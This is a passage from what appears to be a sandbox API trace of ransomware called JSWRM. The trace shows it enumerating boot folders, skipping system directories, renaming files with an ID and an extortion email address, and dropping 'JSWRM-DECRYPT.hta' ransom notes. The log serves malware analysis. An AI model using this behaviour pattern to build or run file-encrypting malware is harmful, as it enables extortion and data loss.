hHeap=0x1e0000) returned 1 [0063.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0063.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0063.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0063.695] CreateFileW (lpFileName="C:\\Boot\\da-DK\\memtest.exe.mui" (normalized: "c:\\boot\\da-dk\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0063.695] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9257990987243128) returned 0 [0063.695] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0063.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0063.695] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0063.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.695] CloseHandle (hObject=0xffffffff) returned 1 [0063.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0063.695] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0063.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.696] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0063.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0063.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.696] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0063.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0063.696] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0063.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0063.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c6f0 [0063.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225fb0 [0063.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c6f0 | out: hHeap=0x1e0000) returned 1 [0063.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0063.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225fb0 | out: hHeap=0x1e0000) returned 1 [0063.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0063.696] MoveFileW (lpExistingFileName="C:\\Boot\\da-DK\\memtest.exe.mui" (normalized: "c:\\boot\\da-dk\\memtest.exe.mui"), lpNewFileName="C:\\Boot\\da-DK\\memtest.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\da-dk\\memtest.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0063.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0063.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0063.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0063.696] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5252b3, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2ef7268, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0063.696] FindClose (in: hFindFile=0x231ac0 | out: hFindFile=0x231ac0) returned 1 [0063.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0063.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0063.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0063.696] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0009692, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef538bee, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="de-DE", cAlternateFileName="")) returned 1 [0063.696] lstrcmpiW (lpString1="de-DE", lpString2=".") returned 1 [0063.696] lstrcmpiW (lpString1="de-DE", lpString2="..") returned 1 [0063.696] lstrcmpiW (lpString1="de-DE", lpString2="...") returned 1 [0063.696] lstrcmpiW (lpString1="de-DE", lpString2="windows") returned -1 [0063.696] lstrcmpiW (lpString1="de-DE", lpString2="recovery") returned -1 [0063.697] lstrcmpiW (lpString1="de-DE", lpString2="perflogs") returned -1 [0063.697] lstrcmpiW (lpString1="de-DE", lpString2="documents and settings") returned -1 [0063.697] lstrcmpiW (lpString1="de-DE", lpString2="$RECYCLE.BIN") returned 1 [0063.697] lstrcmpiW (lpString1="de-DE", lpString2="system volume information") returned -1 [0063.697] lstrcmpiW (lpString1="de-DE", lpString2="msocache") returned -1 [0063.697] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0063.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0063.697] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0063.697] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0063.697] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x237308 [0063.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0063.697] GetFileAttributesW (lpFileName="C:\\Boot\\de-DE\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\de-de\\jswrm-decrypt.hta")) returned 0xffffffff [0063.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x237308 | out: hHeap=0x1e0000) returned 1 [0063.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.697] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0063.697] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0063.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0063.697] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0063.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0063.697] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.697] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x236fe8 [0063.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.697] CreateFileW (lpFileName="C:\\Boot\\de-DE\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\de-de\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0063.698] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0063.698] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0063.699] CloseHandle (hObject=0x450) returned 1 [0063.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236fe8 | out: hHeap=0x1e0000) returned 1 [0063.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0063.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0063.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0063.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0063.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x237268 [0063.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.700] GetFileAttributesW (lpFileName="C:\\Boot\\de-DE\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\de-de\\jswrm-decrypt.hta")) returned 0x20 [0063.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x237268 | out: hHeap=0x1e0000) returned 1 [0063.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0063.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.700] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0009692, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1ca12ddf, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x232000 [0063.700] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.700] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0009692, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1ca12ddf, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0063.701] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.701] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.701] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48079da, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13560, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0063.701] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0063.701] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0063.701] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0063.701] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0063.701] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="recovery") returned -1 [0063.701] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="perflogs") returned -1 [0063.701] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="documents and settings") returned -1 [0063.701] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0063.701] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="system volume information") returned -1 [0063.701] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="msocache") returned -1 [0063.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0063.701] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.701] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0063.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0063.701] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.701] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0063.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0063.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.701] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.701] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0063.701] CreateFileW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0063.702] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9257990987243128) returned 0 [0063.702] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0063.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0063.703] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0063.703] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.703] CloseHandle (hObject=0xffffffff) returned 1 [0063.703] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0063.703] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0063.703] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0063.703] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8638, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0063.703] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.703] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0063.703] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0063.703] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0063.703] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0063.703] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0063.703] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c380 [0063.703] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226130 [0063.703] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c380 | out: hHeap=0x1e0000) returned 1 [0063.703] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0063.703] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226130 | out: hHeap=0x1e0000) returned 1 [0063.703] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.703] MoveFileW (lpExistingFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), lpNewFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0063.703] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0063.704] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0063.704] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0063.704] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ca12ddf, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1ca12ddf, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1ca12ddf, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0063.704] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0063.704] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0063.704] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0063.704] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0063.704] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0063.704] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0063.704] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0063.704] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0063.704] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0063.704] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0063.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0063.704] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0063.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0063.704] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241100, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0063.704] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0063.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0063.704] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0063.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0063.704] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0063.704] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0063.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0063.704] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0063.704] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0063.704] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0063.704] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef538bee, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2ef7268, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0063.704] lstrcmpiW (lpString1="memtest.exe.mui", lpString2=".") returned 1 [0063.704] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="..") returned 1 [0063.704] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="...") returned 1 [0063.704] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="windows") returned -1 [0063.704] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="recovery") returned -1 [0063.704] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="perflogs") returned -1 [0063.705] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="documents and settings") returned 1 [0063.705] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0063.705] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="system volume information") returned -1 [0063.705] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="msocache") returned -1 [0063.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0063.705] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.705] WideCharToMultiByte (in: 